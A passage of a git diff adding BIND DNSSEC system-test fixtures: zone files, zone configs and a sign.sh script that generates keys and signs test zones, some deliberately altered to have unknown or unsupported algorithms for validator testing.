3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.wild A 10.0.0.6 +insecure NS ns.insecure +ns.insecure A 10.53.0.3 +secure NS ns.secure +ns.secure A 10.53.0.3 +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 +optout NS ns.optout +ns.optout A 10.53.0.3 +child NS ns2.example. +insecure.empty NS ns.insecure.empty +ns.insecure.empty A 10.53.0.3 +foo.*.empty-wild NS ns diff --git a/bin/tests/system/dnssec/ns3/optout.nsec3.example.db.in b/bin/tests/system/dnssec/ns3/optout.nsec3.example.db.in new file mode 100644 index 0000000..15fe621 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/optout.nsec3.example.db.in @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + diff --git a/bin/tests/system/dnssec/ns3/optout.optout.example.db.in b/bin/tests/system/dnssec/ns3/optout.optout.example.db.in new file mode 100644 index 0000000..15fe621 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/optout.optout.example.db.in @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + diff --git a/bin/tests/system/dnssec/ns3/publish-inactive.example.db.in b/bin/tests/system/dnssec/ns3/publish-inactive.example.db.in new file mode 100644 index 0000000..14971bd --- /dev/null +++ b/bin/tests/system/dnssec/ns3/publish-inactive.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/dnssec/ns3/rsasha256.example.db.in b/bin/tests/system/dnssec/ns3/rsasha256.example.db.in new file mode 100644 index 0000000..f6c4fab --- /dev/null +++ b/bin/tests/system/dnssec/ns3/rsasha256.example.db.in @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a diff --git a/bin/tests/system/dnssec/ns3/rsasha512.example.db.in b/bin/tests/system/dnssec/ns3/rsasha512.example.db.in new file mode 100644 index 0000000..f6c4fab --- /dev/null +++ b/bin/tests/system/dnssec/ns3/rsasha512.example.db.in @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a diff --git a/bin/tests/system/dnssec/ns3/secure.below-cname.example.db.in b/bin/tests/system/dnssec/ns3/secure.below-cname.example.db.in new file mode 100644 index 0000000..14971bd --- /dev/null +++ b/bin/tests/system/dnssec/ns3/secure.below-cname.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/dnssec/ns3/secure.example.db.in b/bin/tests/system/dnssec/ns3/secure.example.db.in new file mode 100644 index 0000000..ec39308 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/secure.example.db.in @@ -0,0 +1,49 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 +d A 10.0.0.4 +e A 10.0.0.5 +f A 10.0.0.6 +g A 10.0.0.7 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a +zz DNSKEY 258 3 5 Cg== + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns2.insecure +ns2.insecure A 10.53.0.2 + +nosoa NS ns.nosoa +ns.nosoa A 10.53.0.7 + +normalthenrrsig A 10.0.0.28 +rrsigonly A 10.0.0.29 + +cnameandkey CNAME @ +cnamenokey CNAME @ +dnameandkey DNAME @ diff --git a/bin/tests/system/dnssec/ns3/secure.nsec3.example.db.in b/bin/tests/system/dnssec/ns3/secure.nsec3.example.db.in new file mode 100644 index 0000000..15fe621 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/secure.nsec3.example.db.in @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + diff --git a/bin/tests/system/dnssec/ns3/secure.optout.example.db.in b/bin/tests/system/dnssec/ns3/secure.optout.example.db.in new file mode 100644 index 0000000..15fe621 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/secure.optout.example.db.in @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + diff --git a/bin/tests/system/dnssec/ns3/siginterval.example.db.in b/bin/tests/system/dnssec/ns3/siginterval.example.db.in new file mode 100644 index 0000000..ec6603a --- /dev/null +++ b/bin/tests/system/dnssec/ns3/siginterval.example.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2012042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ NS ns +ns A 10.53.0.3 diff --git a/bin/tests/system/dnssec/ns3/siginterval1.conf b/bin/tests/system/dnssec/ns3/siginterval1.conf new file mode 100644 index 0000000..4674cf3 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/siginterval1.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "siginterval.example" { + type primary; + allow-update { any; }; + sig-validity-interval 1 23; + dnskey-sig-validity 90; + auto-dnssec maintain; + file "siginterval.example.db"; +}; diff --git a/bin/tests/system/dnssec/ns3/siginterval2.conf b/bin/tests/system/dnssec/ns3/siginterval2.conf new file mode 100644 index 0000000..46a2007 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/siginterval2.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "siginterval.example" { + type primary; + allow-update { any; }; + sig-validity-interval 35 28; + dnskey-sig-validity 90; + auto-dnssec maintain; + file "siginterval.example.db"; +}; diff --git a/bin/tests/system/dnssec/ns3/sign.sh b/bin/tests/system/dnssec/ns3/sign.sh new file mode 100644 index 0000000..aba74be --- /dev/null +++ b/bin/tests/system/dnssec/ns3/sign.sh @@ -0,0 +1,673 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +echo_i "ns3/sign.sh" + +infile=key.db.in +for tld in managed trusted +do + # A secure zone to test. + zone=secure.${tld} + zonefile=${zone}.db + + keyname1=$("$KEYGEN" -f KSK -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + cat "$infile" "$keyname1.key" > "$zonefile" + "$SIGNER" -z -P -3 - -o "$zone" -O full -f ${zonefile}.signed "$zonefile" > /dev/null + + # Zone to test trust anchor that matches disabled algorithm. + zone=disabled.${tld} + zonefile=${zone}.db + + keyname2=$("$KEYGEN" -f KSK -q -a "$DISABLED_ALGORITHM" -b "$DISABLED_BITS" -n zone "$zone") + cat "$infile" "$keyname2.key" > "$zonefile" + "$SIGNER" -z -P -3 - -o "$zone" -O full -f ${zonefile}.signed "$zonefile" > /dev/null + + # Zone to test trust anchor that has disabled algorithm for other domain. + zone=enabled.${tld} + zonefile=${zone}.db + + keyname3=$("$KEYGEN" -f KSK -q -a "$DISABLED_ALGORITHM" -b "$DISABLED_BITS" -n zone "$zone") + cat "$infile" "$keyname3.key" > "$zonefile" + "$SIGNER" -z -P -3 - -o "$zone" -O full -f ${zonefile}.signed "$zonefile" > /dev/null + + # Zone to test trust anchor with unsupported algorithm. + zone=unsupported.${tld} + zonefile=${zone}.db + + keyname4=$("$KEYGEN" -f KSK -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + cat "$infile" "$keyname4.key" > "$zonefile" + "$SIGNER" -z -P -3 - -o "$zone" -O full -f ${zonefile}.tmp "$zonefile" > /dev/null + awk '$4 == "DNSKEY" { $7 = 255 } $4 == "RRSIG" { $6 = 255 } { print }' ${zonefile}.tmp > ${zonefile}.signed + + # Make trusted-keys and managed keys conf sections for ns8. + mv ${keyname4}.key ${keyname4}.tmp + awk '$1 == "unsupported.'"${tld}"'." { $6 = 255 } { print }' ${keyname4}.tmp > ${keyname4}.key + + # Zone to test trust anchor that is revoked. + zone=revoked.${tld} + zonefile=${zone}.db + + keyname5=$("$KEYGEN" -f KSK -f REVOKE -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + cat "$infile" "$keyname5.key" > "$zonefile" + "$SIGNER" -z -P -3 - -o "$zone" -O full -f ${zonefile}.signed "$zonefile" > /dev/null + + case $tld in + "managed") + keyfile_to_initial_keys $keyname1 $keyname2 $keyname3 $keyname4 $keyname5 > ../ns8/managed.conf + ;; + "trusted") + keyfile_to_static_keys $keyname1 $keyname2 $keyname3 $keyname4 $keyname5 > ../ns8/trusted.conf + ;; + esac +done + +echo_i "ns3/sign.sh: example zones" + +zone=secure.example. +infile=secure.example.db.in +zonefile=secure.example.db + +cnameandkey=$("$KEYGEN" -T KEY -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n host "cnameandkey.$zone") +dnameandkey=$("$KEYGEN" -T KEY -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n host "dnameandkey.$zone") +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$cnameandkey.key" "$dnameandkey.key" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +zone=bogus.example. +infile=bogus.example.db.in +zonefile=bogus.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +zone=dynamic.example. +infile=dynamic.example.db.in +zonefile=dynamic.example.db + +keyname1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +keyname2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") + +cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +zone=keyless.example. +infile=generic.example.db.in +zonefile=keyless.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +# Change the signer field of the a.b.keyless.example RRSIG A +# to point to a provably nonexistent DNSKEY record. +zonefiletmp=$(mktemp "$zonefile.XXXXXX") || exit 1 +mv "$zonefile.signed" "$zonefiletmp" +<"$zonefiletmp" "$PERL" -p -e 's/ keyless.example/ b.keyless.example/ + if /^a.b.keyless.example/../A RRSIG NSEC/;' > "$zonefile.signed" +rm -f "$zonefiletmp" + +# +# NSEC3/NSEC test zone +# +zone=secure.nsec3.example. +infile=secure.nsec3.example.db.in +zonefile=secure.nsec3.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +# +# NSEC3/NSEC3 test zone +# +zone=nsec3.nsec3.example. +infile=nsec3.nsec3.example.db.in +zonefile=nsec3.nsec3.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -o "$zone" "$zonefile" > /dev/null + +# +# OPTOUT/NSEC3 test zone +# +zone=optout.nsec3.example. +infile=optout.nsec3.example.db.in +zonefile=optout.nsec3.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -A -o "$zone" "$zonefile" > /dev/null + +# +# A nsec3 zone (non-optout). +# +zone=nsec3.example. +infile=nsec3.example.db.in +zonefile=nsec3.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -g -3 - -o "$zone" "$zonefile" > /dev/null + +# +# OPTOUT/NSEC test zone +# +zone=secure.optout.example. +infile=secure.optout.example.db.in +zonefile=secure.optout.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +# +# OPTOUT/NSEC3 test zone +# +zone=nsec3.optout.example. +infile=nsec3.optout.example.db.in +zonefile=nsec3.optout.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -o "$zone" "$zonefile" > /dev/null + +# +# OPTOUT/OPTOUT test zone +# +zone=optout.optout.example. +infile=optout.optout.example.db.in +zonefile=optout.optout.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -A -o "$zone" "$zonefile" > /dev/null + +# +# A optout nsec3 zone. +# +zone=optout.example. +infile=optout.example.db.in +zonefile=optout.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -g -3 - -A -o "$zone" "$zonefile" > /dev/null + +# +# A nsec3 zone (non-optout) with unknown nsec3 hash algorithm (-U). +# +zone=nsec3-unknown.example. +infile=nsec3-unknown.example.db.in +zonefile=nsec3-unknown.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -U -o "$zone" "$zonefile" > /dev/null + +# +# A optout nsec3 zone with a unknown nsec3 hash algorithm (-U). +# +zone=optout-unknown.example. +infile=optout-unknown.example.db.in +zonefile=optout-unknown.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -U -A -o "$zone" "$zonefile" > /dev/null + +# +# A zone that is signed with an unknown DNSKEY algorithm. +# Algorithm 7 is replaced by 100 in the zone and dsset. +# +zone=dnskey-unknown.example +infile=dnskey-unknown.example.db.in +zonefile=dnskey-unknown.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -o "$zone" -O full -f ${zonefile}.tmp "$zonefile" > /dev/null + +awk '$4 == "DNSKEY" { $7 = 100 } $4 == "RRSIG" { $6 = 100 } { print }' ${zonefile}.tmp > ${zonefile}.signed + +DSFILE="dsset-${zone}${TP}" +$DSFROMKEY -A -f ${zonefile}.signed "$zone" > "$DSFILE" + +# +# A zone that is signed with an unsupported DNSKEY algorithm (3). +# Algorithm 7 is replaced by 255 in the zone and dsset. +# +zone=dnskey-unsupported.example +infile=dnskey-unsupported.example.db.in +zonefile=dnskey-unsupported.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -o "$zone" -O full -f ${zonefile}.tmp "$zonefile" > /dev/null + +awk '$4 == "DNSKEY" { $7 = 255 } $4 == "RRSIG" { $6 = 255 } { print }' ${zonefile}.tmp > ${zonefile}.signed + +DSFILE="dsset-${zone}${TP}" +$DSFROMKEY -A -f ${zonefile}.signed "$zone" > "$DSFILE" + +# +# A zone with a published unsupported DNSKEY algorithm (Reserved). +# Different from above because this key is not intended for signing. +# +zone=dnskey-unsupported-2.example +infile=dnskey-unsupported-2.example.db.in +zonefile=dnskey-unsupported-2.example.db + +ksk=$("$KEYGEN" -f KSK -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +zsk=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$ksk.key" "$zsk.key" unsupported-algorithm.key > "$zonefile" + +"$SIGNER" -P -3 - -o "$zone" -f ${zonefile}.signed "$zonefile" > /dev/null + +# +# A zone with a unknown DNSKEY algorithm + unknown NSEC3 hash algorithm (-U). +# Algorithm 7 is replaced by 100 in the zone and dsset. +# +zone=dnskey-nsec3-unknown.example +infile=dnskey-nsec3-unknown.example.db.in +zonefile=dnskey-nsec3-unknown.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -o "$zone" -U -O full -f ${zonefile}.tmp "$zonefile" > /dev/null + +awk '$4 == "DNSKEY" { $7 = 100; print } $4 == "RRSIG" { $6 = 100; print } { print }' ${zonefile}.tmp > ${zonefile}.signed + +DSFILE="dsset-${zone}${TP}" +$DSFROMKEY -A -f ${zonefile}.signed "$zone" > "$DSFILE" + +# +# A multiple parameter nsec3 zone. +# +zone=multiple.example. +infile=multiple.example.db.in +zonefile=multiple.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null +mv "$zonefile".signed "$zonefile" +"$SIGNER" -P -u3 - -o "$zone" "$zonefile" > /dev/null +mv "$zonefile".signed "$zonefile" +"$SIGNER" -P -u3 AAAA -o "$zone" "$zonefile" > /dev/null +mv "$zonefile".signed "$zonefile" +"$SIGNER" -P -u3 BBBB -o "$zone" "$zonefile" > /dev/null +mv "$zonefile".signed "$zonefile" +"$SIGNER" -P -u3 CCCC -o "$zone" "$zonefile" > /dev/null +mv "$zonefile".signed "$zonefile" +"$SIGNER" -P -u3 DDDD -o "$zone" "$zonefile" > /dev/null + +# +# A RSASHA256 zone. +# +zone=rsasha256.example. +infile=rsasha256.example.db.in +zonefile=rsasha256.example.db + +keyname=$("$KEYGEN" -q -a RSASHA256 -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +# +# A RSASHA512 zone. +# +zone=rsasha512.example. +infile=rsasha512.example.db.in +zonefile=rsasha512.example.db + +keyname=$("$KEYGEN" -q -a RSASHA512 -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +# +# A zone with the DNSKEY set only signed by the KSK +# +zone=kskonly.example. +infile=kskonly.example.db.in +zonefile=kskonly.example.db + +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cat "$infile" "$kskname.key" "$zskname.key" > "$zonefile" +"$SIGNER" -x -o "$zone" "$zonefile" > /dev/null + +# +# A zone with the expired signatures +# +zone=expired.example. +infile=expired.example.db.in +zonefile=expired.example.db + +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cat "$infile" "$kskname.key" "$zskname.key" > "$zonefile" +"$SIGNER" -P -o "$zone" -s -1d -e +1h "$zonefile" > /dev/null +rm -f "$kskname.*" "$zskname.*" + +# +# A NSEC3 signed zone that will have a DNSKEY added to it via UPDATE. +# +zone=update-nsec3.example. +infile=update-nsec3.example.db.in +zonefile=update-nsec3.example.db + +kskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cat "$infile" "$kskname.key" "$zskname.key" > "$zonefile" +"$SIGNER" -P -3 - -o "$zone" "$zonefile" > /dev/null + +# +# A NSEC signed zone that will have auto-dnssec enabled and +# extra keys not in the initial signed zone. +# +zone=auto-nsec.example. +infile=auto-nsec.example.db.in +zonefile=auto-nsec.example.db + +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cat "$infile" "$kskname.key" "$zskname.key" > "$zonefile" +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +# +# A NSEC3 signed zone that will have auto-dnssec enabled and +# extra keys not in the initial signed zone. +# +zone=auto-nsec3.example. +infile=auto-nsec3.example.db.in +zonefile=auto-nsec3.example.db + +kskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") 